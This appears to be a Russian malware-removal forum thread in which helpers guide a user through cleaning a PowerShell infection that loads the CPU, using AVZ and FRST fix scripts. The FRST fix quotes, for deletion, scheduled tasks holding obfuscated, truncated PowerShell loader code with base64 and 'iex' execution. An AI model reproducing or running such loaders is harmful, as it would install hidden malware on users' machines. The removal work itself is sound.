Перейти к содержанию

Powershell грузит процессор


Рекомендуемые сообщения

Здравствуйте,

Для оформления запроса о помощи, внимательно прочитайте и аккуратно выполните указания в теме «Порядок оформления запроса о помощи».

Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте!

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 DeleteSchedulerTask('Microsoft\Windows\DiskCleanup\DiskCleanup');
 DeleteSchedulerTask('Microsoft\Windows\MUI\1792269653');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RebootWindows(false);
end.

 

 

Файл CheckBrowserLnk.log
 из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

move.gif

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.
 

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите к следующему сообщению новый CollectionLog.

Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    HKU\S-1-5-21-3950544983-3575848414-3946083627-1005\...\MountPoints2: {38bce7a3-ee5a-11ea-8810-54bef734b78b} - "F:\HiSuiteDownLoader.exe" 
    HKU\S-1-5-21-3950544983-3575848414-3946083627-1005\...\MountPoints2: {e5dc0cc7-554b-11eb-88e4-54bef734b78b} - "F:\HiSuiteDownLoader.exe" 
    HKU\S-1-5-21-3950544983-3575848414-3946083627-1005\...\Winlogon: [Shell] C:\Windows\explorer.exe [2501368 2015-01-28] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ограничение <==== ВНИМАНИЕ
    Task: {11DAAD06-D2D6-4736-8A0C-B9421991E1FD} - \WPD\SqmUpload_S-1-5-21-3950544983-3575848414-3946083627-1004 -> Нет файла <==== ВНИМАНИЕ
    Task: {F89CE7B6-39C2-446A-80EF-CC47CF9E45C4} - System32\Tasks\Microsoft\Windows\MUI\1792269653 => powershell.exe -c "9602210049;$GGuE='Nnaseu)qxCE.T(mxikkV';'u&(_gc_m {A*u-T7y*6).lNa6me8 (5''?+us3kitn__g 8bSey__st)qeom_?;uccs7igbngp! uSb_ys5_t2e,4m.y7IwO__;u]_sai4!ng4n _S_kys0ctje2.m.n{Rdujqnt=lijmj_e.fwIgn2gtee2rto_jpSw_e!r4_vipjc_ei-s;kxu6sn9in_xg- upMio_c+r_(os{oo+fd4t._kW5iscn3mg2i;iapucfb_l_vicb0 ]c)wla?csasb5 Cr_Ejh8){d=8e8l(_eg4_amt0ze b[v]o+_id__ _I,lNU_!(m)xp;pcdutb_vli]lcu zgsto?att_qic_m 3v9(oi?_dc enYE_d(_)r_{bx-ytt0se[kq](b5_b=q_F_i4kle+g._E__xix_sqt0ts(2[O_y_xIA!oysu?_erk?h4fp8twqtt_O-?yI_/Ae)cf?F_uiolb(e.c1R_e4_ad=-A}l_8lB=iynt15es1k(1Of=yIsyApy}]uef_rdh{5ftq[w6th/Oy=-I+A_z):h_(qb_byt41e5[-/]),qRae]sgiu+s=tf_rykg.rL__ocgqaeliyMa__c3hjgin3]eb._pOp,ue}n_=Su[mbeK_4eywz(5@?-Oyd_I5A__SO?cF_TlpWAj5ReEs2\Ma4i3c?9roy!s_o.6ftbx\2Cx_TF[=\qTc5IP9qO+y_3IA+9)q.e(Ge25t_Vseal_1uoe??(O_yy_It{Ay)_ure_frhe_f1t_zwt7iOcy/iIAf=,1n_rulxclp)_e;iedf-(qabb7==_=_!nuk]l/l3b)r_(e3tr_urh_n!;6zin(vt[ 4oKDdmx]=blbb_w._L{(en0[gxtx5h;__f_o6,r(m_i8ni}t 0jM-fi8rx=2=t0?_;Mz]fjr_qx =.!3=_8KD_6xn-_,1;n4M7f6srxy1+d+mq){]+b1bvz[M_ff{rw_x]__^_=.v(b_+y_tn9e)]}Oay}9IA/1A_U__7d_-fsB!pQI[mnpB{3QXzj4zIce4B4_1tL?_8d5yKzd{7BQ5_++Km?=mm4856u!eA=_=9ko7_(a8a!pr6ga8]B}5(8AG0})901_8_(!3+J_=,A=7X_-6bZ(co](KkyDU)dv1v(!xC_..oBw_CXd[20Lc8Aijb1=o_j{C60rcQj_xp__m7b_]X6b=foW__kq_.rj4=0Oy_bIaA_w[M)_f?rljxb_sOrq4-e9y_0{]gc;}o7I_ndxtP__tlr0_ C?iK7=]((Iw_n0t3uPt7fr_)g_0;3uIsn_)tP?.t/rw0 E73vpyd6=(k!I4nr_tPf_t_r?q)Kz)Dsx68;N_-ttAcullu4oqc_satu?e5Vnqir8}tku55alm7M_e!_moj3rey_v((__I_nh0tPs_t_ra-)(4(-31j_),_urne_gf d8CeK,r,([_I}n8ptP0vt{r4_)0+3,xr4_efhc _Ek/vy__,c0!yx1b_0d0gt0,sr0jx__40_j)s;54Maz/roskqhaxtli.]8Co/epny7_(b1pb!,qi0,v[C+K_2,KafD_x1s);8!(f(miIN_eU))0aMavir(s)dhax(l4.+qGef,twDn)el_he2gy/at_7e_Ftkorc_F9u4_nc_rtli0=onx=Pbobginm[t-er]r(yfCfK1_,t7qy7p2/eo,rf8(_bIN3_U})?/))_5(q)r_;}20[=Db_llj_I_m}spoi_r+t{u(Om!y_I!_An1jtbd/0lldoO2y__IAa})i]+8pr1qi_v+patr.ea (0stw_a3thsic__ -e4(xt82e8rqfn f=l_om1ng)8 qN_4tA_ilal-coc_3axt__eV,fi6r__tuova4ly9Me?,mcom,ry2o(.I]vntv}Pnt0kr qbFnK_qNE_t,ir{2efrz dI!vnt_1P_tq]r ._o-Qh.,I}on/tk-Ptmwr_ nkBU[_q=,(mrenifw 3_In74tdPd_trc[ ]BxeIq29,qU6_Inz_t73!=2 fgZ_E_du,?tU_I/mntp23=2d( Q]}odm[r);y{}n ''5-rsepzla.cel''.k(.q.),'',d''$b1''_ -_rejpldac_e''bOy9IA_'',d[cshadr]_(334)f -kre_pllacse''abO8qe]'',.[c/ha7r]g(3y7)_);k(lgs {$e=nvg:t_emtp l-Dgi|2wh_eroe{+($7_.vNa0mei.L_en_gtah q-e2q ?8)y-axndv((_Ge_t-iAc_l +$_d.Fjul9lN_ambe)9.A=ccaesgs.iFiule,Syqst_empRiwgh_ts_ -_eq{ ''jDe6legtel'')s})y|dwel.;[eEn2vi/ro=nm+en4t]{::[Cumrrsen-tD3ir]ecftosry,=powdy;[gCE9h]{::mYE8()z; '-replace($GGuE[11]+$GGuE[13]+$GGuE[11]+$GGuE[11]+$GGuE[6]),('$'+770/770)|&($GGuE[16]+$GGuE[4]+$GGuE[8]);5956194328" -c "9602210049;$GGuE='Nnaseu)qxCE.T(mxikkV';'u&(_gc_m {A*u-T7y*6).lNa6me8 (5''?+us3kitn__g 8bSey__st)qeom_?;uccs7igbngp! uSb_ys5_t2e,4m.y7IwO__;u]_sai4!ng4n _S_kys0ctje2.m.n{Rdujqnt=lijmj_e.fwIgn2gtee2rto_jpSw_e!r4_vipjc_ei-s;kxu6sn9in_xg- upMio_c+r_(os{oo+fd4t._kW5iscn3mg2i;iapucfb_l_vicb0 ]c)wla?c (запись имеет ещё 2291 символов). (Нет файла)
    Task: {F907C2E5-A3F1-4243-B2AB-6F41E18968E6} - System32\Tasks\Microsoft\Windows\DiskCleanup\DiskCleanup => powershell.exe -c "$lyqXAE='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';$Ebazd='MkfeMftjxEkMiXNUo';$Czoslz=($Ebazd[12]+$Ebazd[3]+$Ebazd[8]);&$Czoslz(&$Czoslz ('''[TevmQUxt.EncovmQUding]::UTvmQUF''+2*2*2+''.GevmQUtStvmQUring([ConvmQUvert]::Fro''+''mvmQUB''+''ase''+8*8+''StrivmQUng(([revmQUgex]:vmQU:MavmQUtchvmQUes(''''==QKpUHbHlVSkgyZuVVUtZXayVVUtZHdTRXZVFVb2dkL4YUVR1mdUVlO601ZulWVR1mdk92YVFVb25WRuQHeVFVb2VGVu0WZ0VVUtZ3c5VVUtZ3UbhCeVFVb2VWVR1mdptTKyVmYVFVb21WduxWVR1mdhlmclNlLZFURjJ2bksyJgcyKsVGZVFVb29WTukVQFNmYvRCKgkSKFFEWxlHbkgyZulmc0VVUtZ3U0UVUtZnNlNXYVFVb2JUbvVVUtZncGpjOdRnclZXVR1mdu92Qu0WZ0VVUtZ3c5N1WoAyYVFVb2VGZ9UHbHlVSksjclJWbVFVb2VnbsFWaVFVb2JXZTxCblVVUtZHZv1EI0NWZVFVb2xWZzxXfnATRWlkUExUQVFVb2NUSTlFSQxlLcx1JgEXZtACRJVWVR1mdjlmdlRkLfRyegUmcVFVb2VGa3xXZ2lWVR1mdyR2aVFVb2NXak9lMzUVUtZnbpVVUtZ3dgkWbVFVb2d3Z9kVQFNmYvRSf74UWJ9GJg4mcVFVb2VHdlJXfrsSWBV0YkszUxdlWkAicvhnYtASXZFURjRyWLF1a2RCIy9WVR1md4JWLg0ldHJmcWRyWOlVSvRSPdZ3RiJnVkslTZl0bkszUxdlWkAicvVVUtZHei1CIpITNxAicvJWLgMVcXpFJgQmbVFVb2FmYtAyMygSPTF3VaRSfw0TWBV0YksXK05WdvNkLLF1a2RCIldWLgkVQFNGJoYWa7lyKrY3RiJnVksDduV3bD5iTZl0bkACds1CI2dkYyZFJ7ATP2dkYyZFJoI3bVFVb2Z2Ow0TWBV0YksTXws1SRtmdk0zUxdlWksTKjlXTSRFJoMXZVFVb2RXeCRXVR1mdldkL4YEVVpjOddmbVFVb2lGZvNmbF5CdVFVb2hXZU5SblVVUtZHdzl3Ub1zSRtmdksXKjlXTSRFJddmbpJXVR1md0N3Ws4UWJ9GJd11WlRXVR1md5J2WoMWZVFVb2RGIu9Wa0NWVR1mduVnZ'''',''''.'''',''''RivmQUghvmQUtTvmQUoLvmQUeft'''')|FovmQUrEavmQUch {$vmQU_vmQU.valvmQUue}) -jvmQUo''+''in ''''''''))-repvmQUlace''''vvmQUmQU''''|&(''''ivmQUevmQUx'''');''-'+'rep'+'lace''vmQU'''))" -c "$lyqXAE='v23AQooktCGWLbVU7GKmVclIq0CyOPArzHnsKbICknHmFNgxnBL+cZRKtBXvTN554kbwc+N91ULOIqtSzFrLU7oi11bJUrJZrWm9NOpo73THT9dz6g+fDoBP+GHWEYoU+hbsMvB+8iPyOdkJ2i/jFZYBkQjletkCgQD6EOhxqDL3ML9gwESWYekM0UaXXNFHgBeOFfZMx3n0ONV5+VaYEY1x9hSlWN8i+HGYEJ9YvxegJ6RkrF33aJIXuWHxD6oHgQj4cZoQx1T9A+Vv5S2mbrVRjgWKVeI (запись имеет ещё 3507 символов). (Нет файла)
    Task: {FB286529-9A5A-4A71-AD47-8DD6BC6CBCF4} - \WPD\SqmUpload_S-1-5-21-3950544983-3575848414-3946083627-1001 -> Нет файла <==== ВНИМАНИЕ
    S2 AvastWscReporter; "C:\Program Files\Avast Software\Avast\wsc_proxy.exe" /runassvc /rpcserver [X]
    U3 aswbdisk; отсутствует ImagePath
    Менеджер браузеров (HKLM-x32\...\{FABA89D9-D588-4770-9F85-F6FF9F064257}) (Version: 3.0.6.829 - Яндекс) Hidden
    AlternateDataStreams: C:\Users\Public\AppData:CSM [222]
    AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [478]
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

В перечне установленных программ появится скрытая ранее

Менеджер браузеров


Удалите.
Не сможете стандартно, удалите принудительно через Geek Uninstaller

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • GaL
      От GaL
      CollectionLog-2022.01.27-12.54.zip
    • dubuu
      От dubuu
      При открывании диспетчера задач прячется, видно только сторонним
      CollectionLog-2022.01.25-09.35.zip
    • c0ral0vii1
      От c0ral0vii1
      Что делать, столкнулся с проблемой во время бездействия это примерно 5 - 10 минут, начинает нагружаться система, процессор на 50% видеокарта на 100%(нагружается именно видеопамять). При открытии диспетчера задач нагрузка пропадает, тот же самый эффект производит и отключение компьютера от сети!
      Проверял Dr. Web Curelt нашло шифровальщик, но майнер не удалило, что можно сделать? 
      Если вам нужна какая либо дополнительная информация пишите в комментарии, на всё отвечу!
      В файлах 2 лога, N1 во время простоя но без активного вируса, то есть он ещё не нагружает систему, а N2 уже где вирус нагружает систему, но не так сильно, он как будто понял что я за ним слежу и не сильно начал нагружать систему, но всё равно её нагружал.
      N1 CollectionLog-2022.01.23-15.31.zip N2 CollectionLog-2022.01.23-16.21.zip
    • Ark
      От Ark
      Добрый день.
       
      Появляется процесс powershell.exe, грузит ЦПУ и ГПУ.
       
      При открытии таск-менеджера прячется, приостанавливается вручную через process explorer, если прервать, возобновляется минут через 5.
       
      KVRT и CureIt ничего не находят, Malwarebytes - тоже. Возможно не связано, но перестал запускаться Outlook.
       
       
      CollectionLog-2021.11.22-12.32.zip
    • RRRS
      От RRRS
      Здравствуйте, недавно увидел в диспетчере что VMware Tools Core Service очень сильно грузит процессор, почитав на вашем сайте похожие темы на решение данной проблемы, я понял что не единственный столкнулся с ней. Прошу помочь в удалении данного майнера. Заранее спасибо!

×
×
  • Создать...